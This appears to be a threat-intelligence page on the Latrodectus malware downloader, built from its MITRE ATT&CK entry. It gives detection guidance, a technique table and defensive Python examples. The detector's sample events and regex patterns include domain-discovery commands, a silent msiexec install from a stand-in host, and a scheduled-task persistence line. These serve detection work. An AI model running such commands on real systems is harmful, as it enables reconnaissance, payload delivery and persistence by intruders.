S1160: Latrodectus
Latrodectus is a Windows malware downloader that has been used since at least 2023 to download and execute additional payloads and modules. Latrodectus has most often been distributed through email campaigns, primarily by TA577 and TA578, and has infrastructure overlaps with historic IcedID operations.[1][2][3]
Analyst context for executives and security teams
Latrodectus matters because it is described as a Windows downloader: its business risk is not only the first malware event, but what it may enable next through additional payloads and modules. For leaders, this should be treated as a readiness test for email-driven intrusion prevention, Windows endpoint visibility, command-and-control monitoring, and incident response containment before follow-on tooling or data access occurs.
Executive priority
Prioritize Latrodectus as a control-validation scenario rather than a single-signature malware problem. The supplied ATT&CK relationships show behaviors across execution, persistence, discovery, command and control, lateral movement, collection, exfiltration, and stealth. Executives should ask whether the organization can prove visibility from email delivery through Windows execution, scheduled task or WMI abuse, domain discovery, web-based C2, tool download, and potential data movement. This is relevant to business continuity and audit evidence because gaps in any one layer can delay containment of a downloader that is designed to bring in more capability.
Technical view
For SOC, detection engineering, and IR teams, validate coverage on Windows endpoints for downloader-style activity chained from email campaigns into script or command execution, WMI, scheduled tasks, process and file discovery, domain account/group enumeration, VNC-related remote control, web-protocol C2, web-service use, multi-stage channels, ingress tool transfer, local data collection, file deletion, and exfiltration over an existing C2 channel. Because ATT&CK provides no official detection text for this object, detections should be behavior-led and correlated across host, identity, email, and network telemetry rather than dependent on hashes or static signatures, especially given the related obfuscation techniques such as packing, binary padding, dynamic API resolution, and encrypted or encoded files.
Likely telemetry
- Email security logs for campaign delivery, attachments, links, sender infrastructure, and user interaction context.
- Windows endpoint telemetry for process creation, parent-child process chains, command-line arguments, script execution, file writes, module or payload drops, and file deletion.
- Windows management and persistence evidence, including WMI activity and scheduled task creation or modification.
- Identity and directory telemetry for domain account, domain group, logged-on user, and permission discovery patterns.
- Network telemetry including DNS, proxy, firewall, TLS metadata, HTTP/S request patterns, and outbound connections to web services or staged C2 infrastructure.
Detection direction
- Build correlation around sequences: email-originated execution followed by Windows command shell or JavaScript activity, discovery commands, scheduled task or WMI use, and outbound web traffic.
- Tune for behavioral anomalies rather than only indicators, since related techniques include binary padding, software packing, dynamic API resolution, and encoded or encrypted files that can weaken hash and static-signature approaches.
- Baseline legitimate administrative use of WMI, scheduled tasks, command shell, domain enumeration, and VNC to reduce false positives while preserving alerting for unusual parent processes, users, hosts, or timing.
- Validate network detections for web-protocol C2 and legitimate web-service abuse, including cases where traffic blends into common HTTP/S activity.
- Ensure IR triage playbooks look for follow-on payload transfer and multi-stage C2, not just removal of the first observed downloader artifact.
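The sequence-based correlation the bullets above call for, as an added example written for this page (it is not code from MITRE, Glexia or any vendor cited here). It chains the discovery commands quoted in the technique table behind an email-originated script or installer launch, a scheduled-task creation, and an outbound connection from a loader process, and only alerts when an initial-access event anchors the window. The event schema, the 30-minute window, the use of `schtasks.exe` as a stand-in for task creation, and all sample records are constructed assumptions loosely modelled on Sysmon process-creation and network-connection fields.

```python
"""Stage-based correlation of Windows endpoint events into a downloader chain.

Added example for the detection guidance above; not code from MITRE, Glexia or
any cited vendor. Schema, stage rules, window and sample records are assumptions.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

WINDOW_SECONDS = 30 * 60  # assumed per-host correlation window

# Discovery commands quoted in the technique table (T1135, T1482, T1069.002/T1087.002).
DISCOVERY_PATTERNS = {
    "net view /all": re.compile(r"\bnet\s+view\s+/all\b", re.I),
    "nltest /domain_trusts": re.compile(r"\bnltest\s+/domain_trusts\b", re.I),
    'net group "Domain Admins"': re.compile(r'\bnet\s+group\s+"Domain Admins"\s+/domain\b', re.I),
}
MAIL_AND_BROWSER = {"outlook.exe", "msedge.exe", "chrome.exe", "firefox.exe"}
LOADERS = {"wscript.exe", "cscript.exe", "rundll32.exe", "msiexec.exe"}  # T1059.007, T1218.011, T1218.007
STAGES = ("initial", "discovery", "persistence", "c2")


@dataclass(frozen=True)
class Event:
    ts: int            # epoch seconds
    host: str
    kind: str          # "proc" (process creation) or "net" (outbound connection)
    image: str = ""    # image path of the new / connecting process
    parent: str = ""   # proc only: parent image path
    cmdline: str = ""  # proc only: full command line
    dest: str = ""     # net only: destination "ip:port"


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: Event) -> list[tuple[str, str]]:
    """Map one event to zero or more (stage, detail) pairs."""
    tags: list[tuple[str, str]] = []
    img, par = basename(ev.image), basename(ev.parent)
    if ev.kind == "proc":
        if img in LOADERS and par in MAIL_AND_BROWSER:
            tags.append(("initial", f"{img} spawned by {par}"))
        if img == "msiexec.exe" and re.search(r"https?://", ev.cmdline, re.I):
            tags.append(("initial", "msiexec installing a remotely hosted MSI"))
        if img == "cmd.exe":
            for name, pat in DISCOVERY_PATTERNS.items():
                if pat.search(ev.cmdline):
                    tags.append(("discovery", name))
        # Assumption: schtasks.exe stands in for task creation. A task set via COM
        # (T1559.001) leaves no schtasks.exe process; use Security event 4698 instead.
        if img == "schtasks.exe" and re.search(r"/create\b", ev.cmdline, re.I):
            tags.append(("persistence", "scheduled task created"))
    elif ev.kind == "net" and img in LOADERS:
        # Web-protocol C2 (T1071.001) from a loader; a production rule would also
        # exclude allow-listed destinations.
        tags.append(("c2", f"{img} -> {ev.dest}"))
    return tags


def correlate(events: list[Event]) -> dict[str, dict]:
    """Per host: stage hits within WINDOW_SECONDS of the first initial-stage event.

    Alerts only when an initial-stage event anchors the window and at least three
    of the four stages are present, so lone admin enumeration does not fire.
    """
    by_host: dict[str, list[Event]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        by_host[ev.host].append(ev)
    results: dict[str, dict] = {}
    for host, evs in by_host.items():
        anchor = None
        hits: dict[str, list[str]] = defaultdict(list)
        for ev in evs:
            for stage, detail in classify(ev):
                if stage == "initial" and anchor is None:
                    anchor = ev.ts
                if anchor is not None and 0 <= ev.ts - anchor <= WINDOW_SECONDS:
                    hits[stage].append(detail)
        stage_count = sum(1 for s in STAGES if hits.get(s))
        results[host] = {"stages": dict(hits), "alert": "initial" in hits and stage_count >= 3}
    return results


# Constructed sample telemetry (not real captures); 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    Event(1000, "ws-17", "proc", r"C:\Windows\System32\wscript.exe",
          r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
          r'wscript.exe "C:\Users\u\AppData\Local\Temp\invoice.js"'),
    Event(1010, "ws-17", "proc", r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\wscript.exe",
          "msiexec.exe /i http://files.example.invalid/setup.msi /qn"),
    Event(1100, "ws-17", "proc", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\rundll32.exe",
          r"C:\Windows\System32\cmd.exe /c net view /all"),
    Event(1101, "ws-17", "proc", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\rundll32.exe",
          r"C:\Windows\System32\cmd.exe /c nltest /domain_trusts"),
    Event(1102, "ws-17", "proc", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\rundll32.exe",
          r'C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain'),
    Event(1200, "ws-17", "proc", r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\rundll32.exe",
          r'schtasks.exe /create /sc minute /mo 5 /tn Updater /tr "rundll32.exe C:\Users\u\AppData\Roaming\x.dll,run"'),
    Event(1300, "ws-17", "net", r"C:\Windows\System32\rundll32.exe", dest="203.0.113.10:443"),
    # Admin enumeration on another host with no preceding initial-stage event: no alert.
    Event(5000, "admin-01", "proc", r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
          r'cmd.exe /c net group "Domain Admins" /domain'),
]

if __name__ == "__main__":
    for host, r in correlate(SAMPLE_EVENTS).items():
        print(host, "ALERT" if r["alert"] else "ok", r["stages"])
```

Running it flags `ws-17` (all four stages inside the window) and leaves `admin-01` quiet, which is the baseline-versus-anomaly trade-off the third bullet describes: the discovery commands alone are not the signal, the chain is.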
Mitigation priorities
- Start with email security and user-reporting workflows because the official description states Latrodectus has most often been distributed through email campaigns.
- Harden Windows execution paths by limiting unnecessary script execution, monitoring command shell usage, and controlling abuse-prone administrative mechanisms such as WMI and scheduled tasks.
- Reduce identity blast radius by reviewing domain account and group exposure, privileged group membership, and monitoring for abnormal enumeration.
- Restrict and monitor remote access tools such as VNC where not required, and require strong authorization and logging where they are business-approved.
- Improve outbound control by validating proxy, DNS, and firewall policies for unusual web-protocol C2, web-service use, and ingress tool transfer.
Analyst notes and limits
The object is a malware entry for Latrodectus, S1160, in enterprise ATT&CK version 19.1. MITRE describes it as a Windows malware downloader used since at least 2023 to download and execute additional payloads and modules, most often distributed through email campaigns, primarily by TA577 and TA578, with infrastructure overlaps with historic IcedID operations. The relationship set supplies the practical behavior map: discovery, execution, persistence, lateral movement via VNC, command and control, ingress transfer, local data collection, exfiltration over C2, and multiple stealth techniques.
MITRE provides no official detection text for this object, and the supplied top-level tactics are not specified. This take therefore focuses on the official description, Windows platform field, external references, and listed technique relationships. Local conclusions about exposure, active exploitation, control coverage, attribution, or impact require environment-specific telemetry and incident evidence.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1102 | Web Service | Latrodectus has used Google Firebase to download malicious installation scripts. (Citation: Palo Alto Latrodectus Activity June 2024) |
| Enterprise | T1218.011 | Rundll32 Sub-technique | Latrodectus can use rundll32.exe to execute downloaded DLLs. (Citation: Elastic Latrodectus May 2024) (Citation: Bleeping Computer Latrodectus April 2024) |
| Enterprise | T1132.001 | Standard Encoding Sub-technique | Latrodectus has Base64-encoded the message body of an HTTP request sent to C2. (Citation: Latrodectus APR 2024) (Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | The Latrodectus command handler can use `cmd.exe` to run multiple discovery commands. (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1016 | System Network Configuration Discovery | Latrodectus can discover the IP and MAC address of a targeted host. (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1218.007 | Msiexec Sub-technique | Latrodectus has called `msiexec` to install remotely-hosted MSI files. (Citation: Latrodectus APR 2024) (Citation: Bleeping Computer Latrodectus April 2024) |
| Enterprise | T1135 | Network Share Discovery | Latrodectus can run `C:\Windows\System32\cmd.exe /c net view /all` to discover network shares. (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1057 | Process Discovery | Latrodectus can enumerate running processes, including process grandchildren, on targeted hosts. (Citation: Latrodectus APR 2024) (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1033 | System Owner/User Discovery | Latrodectus can discover the username of an infected host. (Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | Latrodectus can create scheduled tasks for persistence. (Citation: Latrodectus APR 2024) (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1204.001 | Malicious Link Sub-technique | Latrodectus has been executed through malicious links distributed in email campaigns. (Citation: Latrodectus APR 2024) (Citation: Bleeping Computer Latrodectus April 2024) |
| Enterprise | T1027.007 | Dynamic API Resolution Sub-technique | Latrodectus can resolve Windows APIs dynamically by hash. (Citation: Latrodectus APR 2024) |
| Enterprise | T1005 | Data from Local System | Latrodectus can collect data from a compromised host using a stealer module. (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Latrodectus has been distributed through reply-chain phishing emails with malicious attachments. (Citation: Bleeping Computer Latrodectus April 2024) |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Latrodectus has the ability to deobfuscate encrypted strings. (Citation: Latrodectus APR 2024) (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1070.004 | File Deletion Sub-technique | Latrodectus has the ability to delete itself. (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1083 | File and Directory Discovery | Latrodectus can collect desktop filenames. (Citation: Latrodectus APR 2024) (Citation: Bitsight Latrodectus June 2024) (Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1559.001 | Component Object Model Sub-technique | Latrodectus can use the Windows Component Object Model (COM) to set scheduled tasks. (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1027.002 | Software Packing Sub-technique | The Latrodectus payload has been packed for obfuscation. (Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1059.007 | JavaScript Sub-technique | Latrodectus has used JavaScript files as part of its infection chain during malicious spam email campaigns. (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) (Citation: Palo Alto Latrodectus Activity June 2024) |
| Enterprise | T1105 | Ingress Tool Transfer | Latrodectus can download and execute PEs, DLLs, and shellcode from C2. (Citation: Latrodectus APR 2024) (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Latrodectus can send registration information to C2 via HTTP `POST`. (Citation: Latrodectus APR 2024) (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Latrodectus can exfiltrate encrypted system information to the C2 server. (Citation: Latrodectus APR 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | Latrodectus has been packed to appear as a component of Bitdefender's kernel-mode driver, TRUFOS.SYS. (Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1106 | Native API | Latrodectus has used multiple Windows APIs post-exploitation, including `GetAdaptersInfo`, `CreateToolhelp32Snapshot`, and `CreateProcessW`. (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1204.002 | Malicious File Sub-technique | Latrodectus has lured users into opening malicious email attachments for execution. (Citation: Bleeping Computer Latrodectus April 2024) |
| Enterprise | T1104 | Multi-Stage Channels | Latrodectus has used a two-tiered C2 configuration, with tier-one nodes connecting to the victim and tier-two nodes connecting to backend infrastructure. (Citation: Latrodectus APR 2024) |
| Enterprise | T1482 | Domain Trust Discovery | Latrodectus can run `C:\Windows\System32\cmd.exe /c nltest /domain_trusts` to discover domain trusts. (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1027.001 | Binary Padding Sub-technique | Latrodectus has been obfuscated with a 129-byte sequence of junk data prepended to the file. (Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1529 | System Shutdown/Reboot | Latrodectus has the ability to restart compromised hosts. (Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1082 | System Information Discovery | Latrodectus can gather operating system information. (Citation: Latrodectus APR 2024) (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | Latrodectus has the ability to identify installed antivirus products. (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1573.001 | Symmetric Cryptography Sub-technique | Latrodectus can send RC4-encrypted data over C2 channels. (Citation: Latrodectus APR 2024) (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1564.004 | NTFS File Attributes Sub-technique | Latrodectus can delete itself while its process is still running through the use of an alternate data stream. (Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1069.002 | Domain Groups Sub-technique | Latrodectus can identify domain groups through `cmd.exe /c net group "Domain Admins" /domain`. (Citation: Bitsight Latrodectus June 2024) (Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | Latrodectus has used a pseudo-random number generator (PRNG) algorithm and a rolling XOR key to obfuscate strings. (Citation: Latrodectus APR 2024) (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Latrodectus can set an AutoRun key to establish persistence. (Citation: Latrodectus APR 2024) |
| Enterprise | T1497.001 | System Checks Sub-technique | Latrodectus can determine if it is running in a virtualized environment by checking the OS version, checking the number of running processes, ensuring a 64-bit application is running on a 64-bit host, and checking if the host has a valid MAC address. (Citation: Latrodectus APR 2024) (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1566.002 | Spearphishing Link Sub-technique | Latrodectus has been distributed to victims through emails containing malicious links. (Citation: Latrodectus APR 2024) (Citation: Bleeping Computer Latrodectus April 2024) |
| Enterprise | T1047 | Windows Management Instrumentation | Latrodectus has used WMI in malicious email infection chains to facilitate the installation of remotely-hosted files. (Citation: Elastic Latrodectus May 2024) (Citation: Bitsight Latrodectus June 2024) |
| Enterprise | T1622 | Debugger Evasion | Latrodectus has the ability to check for the presence of debuggers. (Citation: Latrodectus APR 2024) |
| Enterprise | T1087.002 | Domain Account Sub-technique | Latrodectus can run `C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain` to identify domain administrator accounts. (Citation: Elastic Latrodectus May 2024) |
| Enterprise | T1021.005 | VNC Sub-technique | Latrodectus has routed C2 traffic using Keyhole VNC. (Citation: Palo Alto Latrodectus Activity June 2024) |
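The T1027.001 row states that the sample carried 129 bytes of junk prepended to the file, which shifts the PE header away from offset 0 and defeats naive "MZ at byte 0" triage. The following is an added example written for this page (not code from MITRE, Glexia or any cited vendor) that locates a plausible PE image anywhere in a buffer by validating that the `MZ` stub's `e_lfanew` field points at a `PE\0\0` signature, and reports how many bytes precede it. The minimal PE stub and the 129-byte junk prefix are constructed inline purely to exercise the check.

```python
"""Locate a PE image shifted by prepended junk (binary padding, T1027.001).

Added example for the technique table above; not code from MITRE, Glexia or any
cited vendor. The PE stub and junk prefix below are constructed test data.
"""
from __future__ import annotations

import struct

PE_SIGNATURE = b"PE\x00\x00"


def find_pe_offset(data: bytes) -> int | None:
    """Return the offset of the first plausible PE image in data, else None.

    Plausible means: 'MZ' at offset o, and the 4-byte e_lfanew field at o+0x3C
    points to a 'PE\\0\\0' signature inside the buffer. A result greater than 0
    means bytes were prepended to the image.
    """
    pos = data.find(b"MZ")
    while pos >= 0:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            pe = pos + e_lfanew
            if pe + 4 <= len(data) and data[pe:pe + 4] == PE_SIGNATURE:
                return pos
        pos = data.find(b"MZ", pos + 1)  # stray "MZ" bytes: keep scanning
    return None


def make_minimal_pe() -> bytes:
    """Constructed stand-in for a PE file: 64-byte DOS header with e_lfanew = 0x40,
    then the PE signature and a few zero bytes. Not a loadable image."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + PE_SIGNATURE + b"\x00" * 20


def describe(data: bytes) -> str:
    off = find_pe_offset(data)
    if off is None:
        return "no PE image found"
    return "PE at offset 0" if off == 0 else f"PE image preceded by {off} bytes of padding"


# Constructed samples: a clean stub and the same stub behind 129 junk bytes.
CLEAN = make_minimal_pe()
JUNK = bytes(range(129))
PADDED = JUNK + CLEAN

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("padded", PADDED), ("text", b"not a pe")):
        print(name, describe(blob))
```

Because the check requires `e_lfanew` to land on a real signature, a random `MZ` pair inside the padding does not produce a false offset; the same helper can be pointed at any dropped file from the T1105 stage to decide whether it needs to be carved before hashing or submission to a sandbox.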
Groups, software, and campaigns
G1037: TA577
TA577 is an initial access broker (IAB) that has distributed QakBot and Pikabot, and was among the first observed groups distributing Latrodectus in 2023.[1]
G1038: TA578
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | bee5219d1dcc… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Latrodectus APR 2024: Proofpoint Threat Research and Team Cymru S2 Threat Research. (2024, April 4). Latrodectus: This Spider Bytes Like Ice. Retrieved May 31, 2024.
- [2] Bleeping Computer Latrodectus April 2024: Abrams, L. (2024, April 30). New Latrodectus malware attacks use Microsoft, Cloudflare themes. Retrieved September 13, 2024.
- [3] Bitsight Latrodectus June 2024: Batista, J. (2024, June 17). Latrodectus, are you coming back? Retrieved September 13, 2024.
- [4] IceNova (Citation: Bleeping Computer Latrodectus April 2024)
- [5] Unidentified 111 (Citation: Bleeping Computer Latrodectus April 2024)
- [6] mitre-attack S1160 (MITRE ATT&CK source entry)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.